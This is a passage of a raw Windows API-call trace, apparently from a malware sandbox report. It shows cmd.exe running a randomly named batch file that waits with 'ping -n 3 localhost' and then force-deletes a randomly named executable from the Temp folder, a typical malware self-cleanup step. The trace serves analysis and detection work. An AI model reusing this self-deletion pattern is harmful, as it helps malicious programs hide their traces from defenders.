_Format="\r\n", _ArgList=0x12ed74 | out: _Buffer="\r\n") returned 2 [0118.173] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.173] GetFileType (hFile=0x7) returned 0x2 [0118.346] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x7 [0118.346] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed34 | out: lpMode=0x12ed34) returned 1 [0118.346] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.346] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12ed60, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ed60*=0x2) returned 1 [0118.346] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0118.346] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0118.346] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x12ed70 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0118.346] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x12ed70 | out: _Buffer=">") returned 1 [0118.346] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.346] GetFileType (hFile=0x7) returned 0x2 [0118.347] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.347] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed38 | out: lpMode=0x12ed38) returned 1 [0118.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.347] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x12ed64, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x12ed64*=0x19) returned 1 [0118.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.347] GetFileType (hFile=0x7) returned 0x2 [0118.347] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.347] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efbc | out: lpMode=0x12efbc) returned 1 [0118.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.347] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x190958*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x12efe8, lpReserved=0x0 | out: 
lpBuffer=0x190958*, lpNumberOfCharsWritten=0x12efe8*=0x4) returned 1 [0118.348] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x12eff4 | out: _Buffer=" -n 3 localhost ") returned 16 [0118.348] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.348] GetFileType (hFile=0x7) returned 0x2 [0118.348] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.348] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efb4 | out: lpMode=0x12efb4) returned 1 [0118.348] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.348] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x12efe0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12efe0*=0x10) returned 1 [0118.348] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12f014 | out: _Buffer="\r\n") returned 2 [0118.352] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.352] GetFileType (hFile=0x7) returned 0x2 [0118.353] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0118.353] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efd4 | out: lpMode=0x12efd4) returned 1 [0118.353] _get_osfhandle (_FileHandle=1) returned 0x7 [0118.353] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f000, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12f000*=0x2) returned 1 [0118.353] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0118.353] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0118.353] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0118.353] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0118.353] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0118.353] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0118.353] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0118.353] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0118.353] 
_wcsicmp (_String1="ping", _String2="REN") returned -2 [0118.353] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0118.353] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0118.353] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0118.353] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0118.353] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0118.353] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0118.353] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0118.353] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0118.353] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0118.353] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0118.353] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0118.353] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0118.353] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0118.354] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0118.354] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0118.354] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0118.354] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0118.354] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0118.354] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0118.354] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0118.354] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0118.354] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0118.354] _wcsicmp (_String1="ping", _String2="START") returned -3 [0118.354] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0118.354] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0118.354] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0118.354] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0118.354] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0118.354] _wcsicmp (_String1="ping", _String2="ASSOC") 
returned 15 [0118.354] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0118.354] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0118.354] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0118.354] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0118.354] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0118.354] SetErrorMode (uMode=0x0) returned 0x0 [0118.354] SetErrorMode (uMode=0x1) returned 0x0 [0118.354] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1a0550, lpFilePart=0x12edb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12edb8*="Desktop") returned 0x18 [0118.354] SetErrorMode (uMode=0x0) returned 0x1 [0118.355] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.355] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.355] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0xffffffff [0118.356] GetLastError () returned 0x2 [0118.356] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0xffffffff [0118.356] GetLastError () returned 0x2 [0118.356] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0x1a0838 [0118.356] FindClose (in: 
hFindFile=0x1a0838 | out: hFindFile=0x1a0838) returned 1 [0118.356] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0xffffffff [0118.356] GetLastError () returned 0x2 [0118.356] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x12eb34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12eb34) returned 0x1a0838 [0118.356] FindClose (in: hFindFile=0x1a0838 | out: hFindFile=0x1a0838) returned 1 [0118.356] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.357] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.357] GetConsoleTitleW (in: lpConsoleTitle=0x12eb84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.357] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0118.357] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0118.357] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0118.357] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0xffffffff [0118.357] GetLastError () returned 0x2 [0118.357] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ping", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0xffffffff [0118.357] GetLastError () returned 0x2 [0118.357] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0x1a0d80 [0118.358] FindClose (in: hFindFile=0x1a0d80 | out: hFindFile=0x1a0d80) returned 1 [0118.358] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0xffffffff [0118.358] GetLastError () returned 0x2 [0118.358] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x12e420, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e420) returned 0x1a0d80 [0118.358] FindClose (in: hFindFile=0x1a0d80 | out: hFindFile=0x1a0d80) returned 1 [0118.358] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0118.358] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0118.358] GetConsoleTitleW (in: lpConsoleTitle=0x12e918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0118.358] InitializeProcThreadAttributeList (in: lpAttributeList=0x12e7a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12e868 | out: lpAttributeList=0x12e7a0, lpSize=0x12e868) returned 1 [0118.358] UpdateProcThreadAttribute (in: lpAttributeList=0x12e7a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x12e860, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12e7a0, lpPreviousValue=0x0) returned 1 [0118.358] GetStartupInfoW (in: lpStartupInfo=0x12e75c | out: lpStartupInfo=0x12e75c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0118.358] lstrcmpW 
(lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0118.360] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12e7fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12e848 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x12e848*(hProcess=0x54, hThread=0x58, dwProcessId=0xefc, dwThreadId=0xf00)) returned 1 [0118.362] CloseHandle (hObject=0x58) returned 1 [0118.362] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0118.362] GetEnvironmentStringsW () returned 0x190970* [0118.362] FreeEnvironmentStringsW (penv=0x190970) returned 1 [0118.362] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0126.840] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x12e73c | out: lpExitCode=0x12e73c*=0x0) returned 1 [0126.840] CloseHandle (hObject=0x54) returned 1 [0126.840] _vsnwprintf (in: _Buffer=0x12e884, _BufferCount=0x13, _Format="%08X", _ArgList=0x12e748 | out: _Buffer="00000000") returned 8 [0126.841] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0126.841] GetEnvironmentStringsW () returned 0x192c28* [0126.841] FreeEnvironmentStringsW (penv=0x192c28) returned 1 [0126.841] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.841] GetEnvironmentStringsW () returned 0x192c28* [0126.841] FreeEnvironmentStringsW (penv=0x192c28) returned 1 [0126.841] DeleteProcThreadAttributeList (in: lpAttributeList=0x12e7a0 | out: lpAttributeList=0x12e7a0) 
[0126.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.841] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.841] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.841] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.841] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.841] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.842] SetConsoleInputExeNameW () returned 0x1 [0126.842] GetConsoleOutputCP () returned 0x1b5 [0126.842] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.842] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.842] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12efbc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.842] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.842] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.842] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0126.843] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.843] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0126.843] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12efa0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x12efa0*=0x7c, lpOverlapped=0x0) returned 1 [0126.844] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.844] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, 
lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n") returned 62 [0126.844] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.844] GetFileType (hFile=0x54) returned 0x1 [0126.844] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.844] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.846] _tell (_FileHandle=3) returned 83 [0126.846] _close (_FileHandle=3) returned 0 [0126.846] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12ed74 | out: _Buffer="\r\n") returned 2 [0126.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.846] GetFileType (hFile=0x7) returned 0x2 [0126.846] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.846] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed34 | out: lpMode=0x12ed34) returned 1 [0126.846] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.846] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12ed60, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ed60*=0x2) returned 1 [0126.846] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0126.846] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.847] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x12ed70 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0126.847] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x12ed70 | out: _Buffer=">") returned 1 [0126.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.847] GetFileType (hFile=0x7) returned 0x2 [0126.847] GetStdHandle (nStdHandle=0xfffffff5) returned 
0x7 [0126.847] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12ed38 | out: lpMode=0x12ed38) returned 1 [0126.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.847] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x12ed64, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x12ed64*=0x19) returned 1 [0126.847] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.847] GetFileType (hFile=0x7) returned 0x2 [0126.847] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.848] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efbc | out: lpMode=0x12efbc) returned 1 [0126.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.848] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x19f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x12efe8, lpReserved=0x0 | out: lpBuffer=0x19f008*, lpNumberOfCharsWritten=0x12efe8*=0x3) returned 1 [0126.848] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x12eff4 | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" ") returned 58 [0126.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.848] GetFileType (hFile=0x7) returned 0x2 [0126.848] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.848] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efb4 | out: lpMode=0x12efb4) returned 1 [0126.848] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.848] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x12efe0, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12efe0*=0x3a) returned 1 [0126.849] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x12f014 | out: _Buffer="\r\n") returned 2 [0126.849] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.849] GetFileType (hFile=0x7) returned 0x2 [0126.849] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.849] 
GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12efd4 | out: lpMode=0x12efd4) returned 1 [0126.849] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.849] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x12f000, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12f000*=0x2) returned 1 [0126.849] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0126.849] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0126.849] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0126.849] GetConsoleTitleW (in: lpConsoleTitle=0x12eb84, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.850] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12dbfc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x12dc00, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x12dbfc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0126.850] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0126.850] _wcsicmp (_String1="w588H5dN.exe", _String2=".") returned 73 [0126.850] _wcsicmp (_String1="w588H5dN.exe", _String2="..") returned 73 [0126.850] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 0x2020 [0126.850] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0126.850] _wcsicmp (_String1="w588H5dN.exe", _String2=".") returned 73 [0126.850] _wcsicmp (_String1="w588H5dN.exe", _String2="..") returned 73 [0126.850] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 
0x2020 [0126.850] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe", fInfoLevelId=0x0, lpFindFileData=0x1a0554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1a0554) returned 0x180aa8 [0126.851] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe")) returned 1 [0126.851] FindNextFileW (in: hFindFile=0x180aa8, lpFindFileData=0x1a0554 | out: lpFindFileData=0x1a0554) returned 0 [0126.852] GetLastError () returned 0x12 [0126.852] FindClose (in: hFindFile=0x180aa8 | out: hFindFile=0x180aa8) returned 1 [0126.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.852] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.852] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.853] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.853] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.853] SetConsoleInputExeNameW () returned 0x1 [0126.853] GetConsoleOutputCP () returned 0x1b5 [0126.853] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.853] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.853] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\wllsor5u.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x12efbc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.853] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.853] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.853] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) 
returned 0x53 [0126.854] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.854] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.854] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x12efa0, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x12efa0*=0x3e, lpOverlapped=0x0) returned 1 [0126.854] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\"\r\n") returned 62 [0126.854] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.854] GetFileType (hFile=0x54) returned 0x1 [0126.854] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.854] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.855] _tell (_FileHandle=3) returned 145 [0126.855] _close (_FileHandle=3) returned 0 [0126.855] 